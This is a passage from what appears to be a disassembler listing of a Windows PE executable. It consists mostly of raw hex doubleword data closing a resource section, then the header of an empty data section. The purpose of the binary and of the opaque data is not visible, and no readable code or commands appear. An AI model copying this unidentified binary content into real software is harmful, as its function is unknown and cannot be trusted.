dd 231A15F7h, 733FDAEAh, 0C9A6C6F6h, 78287124h, 73690820h
dd 524BD4CFh, 0C8070C1h, 0DA8359A3h, 5248FF9h, 0B8CBD299h
dd 459C4F0Eh, 7189120Dh, 78E88084h, 0E1D21F89h, 0DEA77013h
dd 97069F17h, 0E2CC7B73h, 3C955E6Eh, 492AD7BDh, 25A85488h
dd 509FFF7Ch, 0A537DFD3h, 33A233D3h, 0D047C99Ah, 0BF2CBDD4h
dd 4F55A65Ah, 0B91F8895h, 7B6B6CD9h, 1836277Ah, 2FC2292Eh
dd 1FB6EFA2h, 0FA3C1096h, 68B0BF7h, 4DBB545Eh, 0F259F5E7h
dd 4854405Bh, 94D93E3Fh, 0FB14CC47h, 0D3D9D932h, 3C7A6F6Eh
dd 0E966C30Fh, 48B74B38h, 3DEAF8AFh, 745222Eh, 66D46086h
dd 947790CDh, 77D67A64h, 0D0B7D7DFh, 1B07EAA8h, 739AA3DEh
dd 0A31741AAh, 4A2C090Ah, 329B3B26h, 54D191C8h, 20BE0CC1h
dd 2EBC4FB4h, 0B51DE68Ch, 3EAC2D47h, 615DE4A5h, 0CD40F590h
dd 0A333E764h, 317AE0B7h, 2BA6DCB6h, 0E1640F82h, 0B048D1C6h
dd 23C01341h, 0C807A0A0h, 8DF2FF50h, 0A8C75073h, 870D722Bh
dd 168DF71Eh, 26B07E7Dh, 0E7778F99h, 78E87912h, 0D596639Bh
dd 1C62CBD7h, 53C25B51h, 0C151C9CDh, 74F57473h, 8EB07938h
dd 0E114014Dh, 0D51AB138h, 80FEA7BCh, 0BDD07BC7h, 0C7BD664Fh
dd 9E304230h, 98834415h, 6CEB5835h, 0CC3EBB40h, 9E173333h
dd 8AC98BCDh, 37E57CA8h, 0A1B8617Dh, 56E8424Ch, 0ACF2D776h
dd 67D65F4Fh, 61904D9Eh, 26951E0Eh, 0A5901800h, 0B103ECDCh
dd 44D94D26h, 0A410C3F9h, 968D8B0Bh, 62E1468Bh, 0B76A094Ch
dd 0B61DA40Bh, 0D2EFB8A8h, 55C3E18Dh, 3F9E67E3h, 0CF5DF0F2h
dd 6B925457h, 5DFD4A80h, 60B93A9Ch, 0DA8C1508h, 4BC57A06h
dd 0B5A2E3E2h, 0C555BCB0h, 0AA1BDF2Ch, 0B5ECC501h, 0EC95275h
dd 501B9EEBh, 0E877D346h, 63AB05B9h, 8210DFEDh, 7F4E0B62h
dd 52FA616Eh, 0C571B179h, 0BBC0B5Ch, 4618548Fh, 9644E3E4h
dd 72D26E36h, 8637BF8Fh, 0B42CF30Ah, 9130A9D7h, 0A00EA9A9h
dd 1EE0908h, 9C2B2248h, 9A811727h, 6EED5A5Bh, 0BB233D14h
dd 2D90DD41h, 0C4A89494h, 0BC1BA4BFh, 7FE7D1Ah, 3EE6B2FEh
dd 0A493E53h, 69D87D99h, 9A7F83D0h, 49C14455h, 0C693FAE3h
dd 72AABEEEh, 46856597h, 59A1203Eh, 6D743D21h, 64D36CA4h
dd 3B32A19Dh, 13BE32BEh, 5064078Ah, 6F50D9F6h, 719D8EF4h
dd 0F65DFEA8h, 2B8A9DF7h, 9B4D6757h, 50B84BCAh, 4E8D1639h
dd 2BEDEFD2h, 0DD498CB6h, 0EF54C444h, 63F0BE4Bh, 0C9D780FCh
dd 5ACA5377h, 3241C9B5h, 0E6892232h, 48C4E815h, 0D84B08DFh
dd 64F0403Fh, 0A44DDCD1h, 0BB21D0CCh, 0C33A5E12h, 0B61491FCh
dd 1583758Eh, 0C16E7C7Ch, 0D472C36Dh, 9E1FB662h, 7B01AAB6h
dd 0C9F0876h, 52C055B2h, 0FC56EFB9h, 453A5650h, 3C923356h
dd 91A829D7h, 0AA9D061Bh, 0BB789A56h, 7D5BF4F7h, 4DBB513Dh
dd 59AF3EB4h, 557A230Ch, 4710CFFEh, 9ED0D1E2h, 0A967CEC3h
dd 0B9DB5D2Ch, 6D59EFF0h, 48B64D40h, 0A985422Eh, 6F210E0Fh
dd 66D46C6Fh, 0EA9E5932h, 0E1122C1Dh, 84F28A1Ch, 8E8561BBh
dd 0D64E184Bh, 0A3208567h, 7729C98Fh, 72470064h, 54D1C7C8h
dd 20BE0B41h, 0C26E646Ch, 0DF7CC540h, 0B3853046h, 0AE2B0E20h
dd 68945405h, 5CFB48DDh, 38250346h, 1B8A22AAh, 0F1E5C209h
dd 55781EE1h, 988E7C4h, 678266A0h, 0F967302Eh, 56AD6035h
dd 22D9BDD4h, 16B633DBh, 7A1A86FEh, 0D545BD58h, 0A129AE3Ch
dd 9433BC39h, 0A730EB91h, 7F77CEA4h, 73A4BA8Ah, 13C19F15h
dd 0CC6D7979h, 0D10FF81Ch, 41773089h, 0E7016861h, 0EF5DF662h
dd 0C75B7D08h, 51489181h, 3D502480h, 0BE66F974h, 7D3AE3F3h
dd 0DDC8DB32h, 1F746D6Dh, 0EA68D14Eh, 5DD0513Bh, 0FB17B0B0h
dd 0C9E2EF43h, 0EAD65F43h, 4A21EA8Ah, 16A561BBh, 33FBDD8Dh
dd 0C11767E6h, 4C538D58h, 0B613E1A9h, 49600941h, 46956169h
dd 0CDD149C1h, 7098C9E8h, 90CBCC83h, 6D1ED518h, 0F82B8FAh
dd 9F114EA6h, 0D0480606h, 73ED1E53h, 870CEBE4h, 32A90001h
dd 3CEFCBBh, 0D139C6C2h, 74E30C08h, 655EA281h, 0C942E794h
dd 0F40DE360h, 0D228C1BFh, 44DF711Fh, 5A261581h, 5BCDDFEDh
dd 35962A0Fh, 8EE69EF6h, 0A4693497h, 54C458B4h, 0D0069ABBh
dd 0ECD41C11h, 42C99EEFh, 0DE8559D9h, 59AAD169h, 91009990h
dd 0D1874575h, 3E85868h, 9CDF2248h, 0CFFB1727h, 0DB502208h
dd 0CE0CF92Ah, 38AE90B6h, 1FB94A4h, 0DC740D7Eh, 21747853h
dd 0F84FE3B2h, 26C487EDh, 915B7141h, 5818AED0h, 9D1ACEBBh
dd 87C6A370h, 49A7E35Eh, 0AED55E3Bh, 59EB5BF7h, 0E6637F6Ch
dd 65A4E165h, 0BB92120h, 9E1FE500h, 82C1A675h, 15D74D1Ah
dd 0BEE3F0A2h, 9123193Dh, 6FD28808h, 5ECE5772h, 8F45ECB2h
dd 0E18D2653h, 4DC0EC10h, 23F664E4h, 3CAB746Ah, 19CDB2D7h
dd 0FB5A23A5h, 5ACA6362h, 94D74707h, 0F0892211h, 87177F88h
dd 0D8432282h, 1958F5B2h, 68509FAEh, 0C749F36Bh, 0A93DDD5Eh
dd 0B69F39B2h, 900D1D1Dh, 74D34C7Fh, 2B14DBB1h, 38E66AEh
dd 9CC11F9Ah, 0F3605D7Eh, 200725Ah, 0E21CD2E9h, 11171973h
dd 261E7778h, 0FBCC4328h, 0D71E3607h, 0BC789A69h, 675BF4F1h
dd 7D8B53D0h, 0A6973EB4h, 817A2324h, 5BE961E6h, 0A16A80D2h
dd 0BF676132h, 89C7BC84h, 0E6A91773h, 48B24FD4h, 5715C4AFh
dd 374509BAh, 7741926Eh, 4533FCE1h, 0A19CD3D5h, 84F28865h
dd 0D44A6F62h, 8A824A7Bh, 0F3416AA9h, 5374635Bh, 51C8DD96h
dd 54D1C7F8h, 20BE0CDDh, 0FBE24602h, 0DF4CE623h, 0BB258C75h
dd 9E3B94BAh, 953A5554h, 5CC4647Bh, 0F9BF3C93h, 9E8A130Fh
dd 46D8D42h, 5348E1E2h, 99862C4h, 0D28C63A0h, 9834B838h
dd 85F4605Fh, 46D17EBDh, 930FFEE9h, 75D54E52h, 6D789657h
dd 34A426F0h, 55004EA8h, 15950A0Ch, 63E5DED2h, 0BCE2BA8Ah
dd 0EB8751ADh, 226D4F9Ah, 9288D7C0h, 794F3B2Ch, 8CD656FCh
dd 0B0677726h, 0B7D33F21h, 2D55ABC1h, 7F7D196Fh, 5090FFABh
dd 0CF2E9158h, 6F172371h, 530E6DDAh, 6F6330D2h, 4988614Ah
dd 0ED9CE973h, 80FE1C34h, 67D66FD7h, 0F6F60EFDh, 16BB191Ch
dd 0B4DABDA3h, 0AE27A2CCh, 34DF223Eh, 0CA7B85CAh, 97F646Dh
dd 4B85649h, 0A75DA8BBh, 42E25A09h, 0F487AAB5h, 0CF749793h
dd 74DA0968h, 0EF61C8D4h, 90042867h, 2FE20903h, 0D413EAA7h
dd 3CAE1419h, 0F8FEDF4h, 0FB7BDE8Ah, 5DC3262Ah, 0AB34D6C9h
dd 801D7121h, 7AF4070Ch, 0DC5AAEDDh, 27B2537Ah, 59DBBE5Ch
dd 0B734B9B4h, 38985A50h, 1EFB1596h, 0C554E671h, 0D78AED5Ch
dd 1AD1B852h, 2C02156Eh, 1C90300Eh, 59822EACh, 2A2CB1C7h
dd 2100A9A8h, 0F4B67BC4h, 0BECAF6AAh, 0C5318837h, 0E399CE0h
dd 0B102A953h, 817EE80Ah, 0C5E96C71h, 6405BFDBh, 0EC5AF1DFh
dd 4BBA0B3Bh, 5AF1E9B2h, 7E86EDEFh, 7255FA51h, 4437E0E0h
dd 0E7BC3104h, 0B4CA02C1h, 60F11D13h, 47CBC397h, 81A11820h
dd 0F6880D3Dh, 0AB58AFC8h
dd 79BFC020h, 23A205D4h, 0B12E0176h, 836C4520h, 3B8C4F3Bh
dd 8123AADFh, 743334A2h, 2BE05B8Bh, 0CA2DFA1Bh, 95B0C5CEh
dd 2E694384h, 0DD4BD4D4h, 79F30179h, 0A138D7A3h, 0FB384050h
dd 0A5EF4816h, 87293D3Eh, 19C47669h, 28D593F4h, 0AC47B097h
dd 64E67D34h, 12099FCEh, 89A00BFh, 6696DBA0h, 85CFBD8Dh
dd 0EA7A82F4h, 49E0F783h, 970C928Ch, 0CD85BF34h, 0C43C6565h
dd 0FC2EACB9h, 0AD3E45DEh, 0F1488546h, 95702A2Ah, 8F218969h
dd 846E86EAh, 29193978h, 0BD036A68h, 13751C2Eh, 0C9B4ABAAh
dd 52E54E4Dh, 1A92C127h, 83D97273h, 34C72F8Bh, 2A9831DAh
dd 6476CD91h, 0E966C6C9h, 48B77DB9h, 9AEACAAFh, 3756BB84h
dd 0EFB06D5Eh, 958E4CEFh, 24931C1Dh, 2A1A81F9h, 0DAE1515h
dd 43B14B58h, 0EE2E28CCh, 0AF50650h, 0EACF6868h, 1F2DFB96h
dd 70B5A64Eh, 876889C2h, 284CE5E6h, 1EAC5305h, 1B04A4A5h
dd 0FD6B04EEh, 5E972792h, 0BCCB47CCh, 650B2323h, 5AC9A2A2h
dd 0ECCEEC1h, 0D1A84141h, 66F85D07h, 0F8AE820Fh, 154C605Fh
dd 0A76C34B6h, 12F5DE35h, 700EBE4Eh, 9FCD15DFh, 1F21B42Ch
dd 7C03ACABh, 0B9D06ADh, 53C2F4B3h, 94BC31BAh, 11812A2Ah
dd 41D052E4h, 2D5130D8h, 0B490C7C7h, 8FFE9718h, 0DF7E437Dh
dd 10365666h, 46C2B689h, 0F283E842h, 265A0906h, 0CC3AB3F7h
dd 7D64B8D3h, 7EDE891h, 0DA48F144h, 59C25251h, 0A9114309h
dd 0AD844710h, 65356EDEh, 996A6A3Dh, 0B4A4217Ch, 85760A00h
dd 6C35ECECh, 0BB4CD7DCh, 41C24354h, 8828F4F4h, 28D26620h
dd 0C47144D9h, 0A8B86A02h, 80EFD70Fh, 0C00820E7h, 1F8E6767h
dd 1425ED2Fh, 7BE6164Ch, 5DFD5642h, 0CE248FFDh, 14C6AC27h
dd 0F8FBC682h, 504ABB81h, 0A9A6CC7h, 924BA3A1h, 0CA394100h
dd 7A4206B2h, 0E02A4EDBh, 278F9C9Ch, 79E7804Eh, 29BA4B59h
dd 1613C0C2h, 6A05AEACh, 0C5489069h, 4B71A25Ch, 4B238C8Bh
dd 23A8D18Eh, 796FF67Ah, 5F41EAE9h, 19129ACh, 0FB52C898h
dd 0F6EA07F8h, 0AFBF6868h, 8032D222h, 8CBE817h, 91DD4646h
dd 0FE171840h, 0D229B835h, 73FBA4BAh, 0DC6AF046h, 0DE450553h
dd 0AB299EEFh, 3A7EB791h, 0AAD87141h, 0C937D038h, 29FD6D30h
dd 0AD1B620Eh, 170DEEDEh, 3E308F41h, 23149DB8h, 0CDF7CECDh
dd 0A5DC9C93h, 0F427B34Eh, 33AFE82Bh, 0F7F1A08Ah, 9ED18FF5h
dd 30DC456Dh, 496FBBDDh, 0FF90F7CCh, 4266212h, 57D2393Bh
dd 0E172D9F4h, 5013ABE4h, 0CF7FB29Ch, 3CAB61FCh, 39E2C3A3h
dd 8E95FCFCh, 7E8EE85Bh, 459C4FF1h, 9289120Fh, 0F98E89D0h
dd 0AB45E6E5h, 37CF161Ah, 1C06609Eh, 0A565943Ah, 0FF50A10Eh
dd 35248D91h, 2B0515D9h, 28DC4320h, 12C1D8AEh, 0CEAAD33Fh
dd 0ECE96565h, 929F0605h, 52B4E199h, 3F4B8B9h, 117F37A1h
dd 70CE9F78h, 0F0FFD6D7h, 2FAD8E37h, 8D149596h, 2C5BF4F5h
dd 19365471h, 83D7BF90h, 707AEB97h, 6B31126Ah, 4038D1D2h
dd 77A81566h, 64768A1Ah, 0E966C447h, 0B75848B8h, 0ACD7CF50h
dd 150Dh dup(0)
_rsrc ends
; Section 4. (virtual address 0000F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000E400
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 100F000h
align 2000h
_idata2 ends
end start